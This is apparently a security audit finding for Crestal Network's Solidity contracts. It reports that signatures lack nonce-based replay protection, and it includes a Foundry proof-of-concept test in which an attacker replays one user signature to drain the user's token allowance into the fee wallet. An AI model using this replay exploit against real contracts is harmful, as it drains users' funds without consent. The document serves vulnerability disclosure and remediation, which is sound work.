Stale Admiral Beaver

High

# Attackers can drain user funds and waste worker resources through signature replay attacks

### Summary

The absence of nonce-based replay protection in the signature verification mechanism will cause unauthorized token loss for users as attackers can replay signatures multiple times to force repeated payments for agent configuration updates. Additionally, this vulnerability enables denial-of-service conditions by wasting worker resources and disrupting agent operations through repeated configuration updates.

### Root Cause

In [src/BlueprintCore.sol#L671-L685](https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/BlueprintCore.sol#L671-L685) and [src/EIP712.sol#L32-L44](https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/EIP712.sol#L32-L44), the signature verification mechanism lacks a nonce system to prevent replay attacks. Signatures are created using only the project ID, configuration data, and server URL without any uniqueness guarantor:

```solidity
function getRequestDeploymentDigest(bytes32 projectId, string memory base64RecParam, string memory serverURL)
    public
    view
    returns (bytes32)
{
    bytes32 structHash = keccak256(
        abi.encode(
            DEPLOYMENT_REQUEST_TYPEHASH, projectId, keccak256(bytes(base64RecParam)), keccak256(bytes(serverURL))
        )
    );

    return _hashTypedDataV4(structHash);
}
```

These signatures are then used in functions like `updateWorkerDeploymentConfigWithSig()` at [src/BlueprintCore.sol#L671-L685](https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/BlueprintCore.sol#L671-L685) without checking if they've been used before:

```solidity
function updateWorkerDeploymentConfigWithSig(
    address tokenAddress,
    bytes32 projectId,
    bytes32 requestID,
    string memory updatedBase64Config,
    bytes memory signature
) public {
    // get EIP712 hash digest
    bytes32 digest = getRequestDeploymentDigest(projectId, updatedBase64Config, "app.crestal.network");

    // get signer address
    address signerAddr = getSignerAddress(digest, signature);

    updateWorkerDeploymentConfigCommon(tokenAddress, signerAddr, projectId, requestID, updatedBase64Config);
}
```

### Internal Pre-conditions

1. User needs to have created an agent using `createAgentWithToken` or a similar function
2. User needs to have approved the protocol to spend their tokens
3. `paymentOpCostMp[tokenAddress][UPDATE_AGENT_OP]` needs to be greater than 0 (token cost for updates is set)
4. User needs to sign a configuration update message for their agent

### External Pre-conditions

None - this vulnerability doesn't depend on external protocols or conditions

### Attack Path

1. Legitimate user signs a message authorizing a configuration update for their agent
2. User's signature is submitted once legitimately (or intercepted before submission)
3. Attacker observes the transaction on-chain and extracts the signature
4. Attacker repeatedly calls `updateWorkerDeploymentConfigWithSig()` with the captured signature
5. For each call, tokens are transferred from the victim's account to the fee collection wallet via [src/Payment.sol#L25-L32](https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/Payment.sol#L25-L32):
   ```solidity
       function payWithERC20(address erc20TokenAddress, uint256 amount, address fromAddress, address toAddress) public {
        // check from and to address
        require(fromAddress != toAddress, "Cannot transfer to self address");
        require(toAddress != address(0), "Invalid to address");
        require(amount > 0, "Amount must be greater than 0");
        IERC20 token = IERC20(erc20TokenAddress);
        token.safeTransferFrom(fromAddress, toAddress, amount);
    }
   ```
6. Each replay also emits an `UpdateDeploymentConfig` event that workers must process
7. If the deployment was in `GeneratedProof` state, each replay resets it to `Pickup` state
8. The process can be repeated until the user's token balance or allowance is exhausted
### Impact

The vulnerability has two major impact vectors:

**1. Financial Impact:**
- Users suffer unlimited token loss proportional to the number of times their signature is replayed
- For each replay, the user loses exactly the configured update cost (from `paymentOpCostMp[tokenAddress][UPDATE_AGENT_OP]`)
- The attacker doesn't gain these tokens directly, but the protocol's fee collection wallet receives them

**2. Operational Impact:**
- Worker resources are wasted processing redundant identical configuration updates
- Each update may trigger resource-intensive operations (parsing, validation, service restarts)
- Deployment status is repeatedly reset, potentially disrupting the normal agent lifecycle
- Platform stability may be affected if workers become overloaded with processing duplicate updates
- Other users' agents may experience degraded performance if they share worker infrastructure
- Logs and monitoring systems may be flooded with duplicate entries, obscuring legitimate issues

While the attacker cannot modify the configuration content (they can only replay the exact signed configuration), the repeated processing of the same update can still cause significant operational disruption.
### PoC

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.26;

import {Test, console} from "forge-std/Test.sol";
import {Vm} from "forge-std/Vm.sol";
import {BlueprintV5} from "../src/BlueprintV5.sol";
import {MockERC20} from "./MockERC20.sol";

/**
 * @title SignatureReplayVulnerabilityTest
 * @notice Minimal POC demonstrating the signature replay vulnerability
 */
contract SignatureReplayVulnerabilityTest is Test {
    BlueprintV5 public blueprint;
    MockERC20 public mockToken;
    bytes32 public projectId;
    address public workerAddress;

    // Test user
    uint256 public userPrivateKey;
    address public userAddress;

    // Attacker
    address public attacker = address(0xDEAD);

    // Constants
    uint256 public constant TOKEN_AMOUNT = 100 * 10 ** 18; // 100 tokens
    uint256 public constant UPDATE_COST = 10 * 10 ** 18; // 10 tokens per update
    uint256 public constant NUM_REPLAYS = 10; // Number of replays to completely drain user

    function setUp() public {
        // Create and initialize the blueprint contract
        blueprint = new BlueprintV5();
        blueprint.initialize();

        // Setup mock token
        mockToken = new MockERC20();

        // Set fee collection wallet
        blueprint.setFeeCollectionWalletAddress(address(0xFEE));

        // Set project and worker addresses
        projectId = bytes32(uint256(0x123));
        workerAddress = address(0xCAFE);

        // Setup test user with known private key
        userPrivateKey = 0xB0B;
        userAddress = vm.addr(userPrivateKey);

        // Setup payment token
        blueprint.addPaymentAddress(address(mockToken));
        blueprint.setUpdateCreateAgentTokenCost(
            address(mockToken),
            UPDATE_COST
        );
    }

    /**
     * @notice POC for signature replay vulnerability
     * Shows how a single attacker can repeatedly replay the same signature to drain all user funds
     */
    function test_signatureReplayVulnerability() public {
        // 1. Setup - Create agent with user as owner
        bytes32 requestId = setupUserAgent();

        // 2. User signs an update message (just once)
        bytes memory signature = createUserSignature("updated config data");

        // 3. Fund user with tokens and approve spending
        vm.startPrank(userAddress);
        mockToken.mint(userAddress, TOKEN_AMOUNT);
        mockToken.approve(address(blueprint), TOKEN_AMOUNT);
        vm.stopPrank();

        // Record initial balance
        uint256 initialBalance = mockToken.balanceOf(userAddress);
        console.log(
            "Initial user balance: %d tokens",
            initialBalance / 10 ** 18
        );

        // 4. ATTACK: Attacker repeatedly replays the same signature
        vm.startPrank(attacker);
        console.log("Attacker address: %s", vm.toString(attacker));

        for (uint i = 1; i <= NUM_REPLAYS; i++) {
            console.log("Replay #%d", i);

            // The core vulnerability: replay the SAME signature multiple times
            blueprint.updateWorkerDeploymentConfigWithSig(
                address(mockToken),
                projectId,
                requestId,
                "updated config data",
                signature
            );

            // Verify tokens were lost
            uint256 currentBalance = mockToken.balanceOf(userAddress);
            console.log(
                "User balance after replay #%d: %d tokens",
                i,
                currentBalance / 10 ** 18
            );
        }
        vm.stopPrank();

        // Verify complete drainage
        uint256 finalBalance = mockToken.balanceOf(userAddress);
        assertEq(
            finalBalance,
            0,
            "User's account should be completely drained after all replays"
        );

        // Show total damage
        console.log("------------------------------------");
        console.log("PROOF OF CONCEPT SUMMARY:");
        console.log("Initial balance: %d tokens", initialBalance / 10 ** 18);
        console.log("Final balance: %d tokens", finalBalance / 10 ** 18);
        console.log(
            "Total tokens stolen: %d tokens (100% of balance)",
            (initialBalance - finalBalance) / 10 ** 18
        );
        console.log("Number of replays: %d", NUM_REPLAYS);
        console.log("RESULT: COMPLETE ACCOUNT DRAIN SUCCESSFUL");
        console.log("------------------------------------");
    }

    // Helper function to create an agent owned by the test user
    function setupUserAgent() private returns (bytes32 requestId) {
        // Create agent as the user to establish ownership
        vm.startPrank(userAddress);
        requestId = blueprint.createAgentWithToken(
            projectId,
            "base64 proposal",
            workerAddress,
            "app.crestal.network",
            address(mockToken)
        );
        vm.stopPrank();
        return requestId;
    }

    // Helper function to create a user signature
    function createUserSignature(
        string memory updatedConfig
    ) private view returns (bytes memory signature) {
        // Create the digest that will be signed
        bytes32 digest = blueprint.getRequestDeploymentDigest(
            projectId,
            updatedConfig,
            "app.crestal.network"
        );

        // Sign the digest with the user's private key
        (uint8 v, bytes32 r, bytes32 s) = vm.sign(userPrivateKey, digest);
        signature = abi.encodePacked(r, s, v);

        return signature;
    }
}
```
